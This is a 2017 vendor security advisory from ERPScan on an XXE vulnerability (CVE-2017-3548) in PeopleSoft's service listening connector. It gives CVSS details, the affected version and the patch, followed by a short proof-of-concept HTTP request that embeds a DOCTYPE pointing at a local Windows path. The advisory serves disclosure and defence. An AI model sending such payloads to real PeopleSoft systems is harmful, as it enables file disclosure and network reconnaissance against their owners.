 Reference: Oracle CPU April 2017
 Author: Nadya Krivdyuk (ERPScan)
 Description
 1. ADVISORY INFORMATION
 Title:[ERPSCAN-17-020] XXE VIA DOCTYPE in PeopleSoft
 PeopleSoftServiceListeningConnector
 Advisory ID: [ERPSCAN-17-020]
 Risk: high
 CVE: CVE-2017-3548
 Advisory URL: https://erpscan.com/advisories/erpscan-17-020-xxe-via-doctype-peoplesoft/
 Date published: 18.04.2017
 Vendors contacted: Oracle
 2. VULNERABILITY INFORMATION
 Class: XXE
 Impact: File disclosure, network discovery
 Remotely Exploitable: yes
 Locally Exploitable: no
 CVSS Information
 CVSS Base Score v3:    8.0 / 10
 CVSS Base Vector:
 AV : Attack Vector (Related exploit range) Network (N)
 AC : Attack Complexity (Required attack complexity) High (H)
 PR : Privileges Required (Level of privileges needed to exploit) High (H)
 UI : User Interaction (Required user participation) None (N)
 S : Scope (Change in scope due to impact caused to components beyond
 the vulnerable component) Changed (C)
 C : Impact to Confidentiality High (H)
 I : Impact to Integrity High (H)
 A : Impact to Availability High (H)
 3. VULNERABILITY DESCRIPTION
 A malicious user can modify an XML-based request to include XML
 content that is then parsed locally.
 4. VULNERABLE PACKAGES
 PeopleSoft HCM 9.2 on PeopleTools 8.55
 5. SOLUTIONS AND WORKAROUNDS
 To correct this vulnerability, implement Oracle CPU April 2017
 6. AUTHOR
 Nadya Krivdyuk
 7. TECHNICAL DESCRIPTION
 An attacker can use an XML external entity vulnerability to send
 specially crafted unauthorized XML requests, which will be processed
 by the XML parser. The attacker can use an XML external entity
 vulnerability for getting unauthorised access to the OS file system.
 PoC
 POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
 Host: 172.16.2.91:8000
 Content-type: text/xml
 <!DOCTYPE a PUBLIC "-//B/A/EN" "C:\windows">
 8. ABOUT ERPScan Research
 ERPScan research team specializes in vulnerability research and
 analysis of critical enterprise applications. It was acknowledged
 multiple times by the largest software vendors like SAP, Oracle,
 Microsoft, IBM, VMware, HP for discovering more than 400
 vulnerabilities in their solutions (200 of them just in SAP!).
 ERPScan researchers are proud of discovering new types of
 vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
 Best Server-Side Bug" nomination at BlackHat 2013.
 ERPScan experts participated as speakers, presenters, and trainers at
 60+ prime international security conferences in 25+ countries across
 the continents ( e.g. BlackHat, RSA, HITB) and conducted private
 trainings for several Fortune 2000 companies.
 ERPScan researchers carry out the EAS-SEC project that is focused on
 enterprise application security awareness by issuing annual SAP
 security researches.
 ERPScan experts were interviewed in specialized info-sec resources and
 featured in major media worldwide. Among them there are Reuters,
 Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
 Chinabyte, etc.
 Our team consists of highly-qualified researchers, specialized in
 various fields of cybersecurity (from web application to ICS/SCADA
 systems), gathering their experience to conduct the best SAP security
 research.
 9. ABOUT ERPScan
 ERPScan is the most respected and credible Business Application
 Cybersecurity provider. Founded in 2010, the company operates globally
 and enables large Oil and Gas, Financial, Retail and other
 organizations to secure their mission-critical processes. Named as an
 ‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP
 Solution providers” and distinguished by 30+ other awards, ERPScan is
 the leading SAP SE partner in discovering and resolving security
 vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
 assist in improving the security of their latest solutions.
 ERPScan’s primary mission is to close the gap between technical and
 business security, and provide solutions for CISO's to evaluate and
 secure SAP and Oracle ERP systems and business-critical applications
 from both cyberattacks and internal fraud. As a rule, our clients are
 large enterprises, Fortune 2000 companies and MSPs, whose requirements
 are to actively monitor and manage security of vast SAP and Oracle
 landscapes on a global scale.
 We ‘follow the sun’ and have two hubs, located in Palo Alto and
 Amsterdam, to provide threat intelligence services, continuous support
 and to operate local offices and partner network spanning 20+
 countries around the globe.
 Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
 Phone: 650.798.5255
 Twitter: @erpscan
 Scoop-it: Business Application Security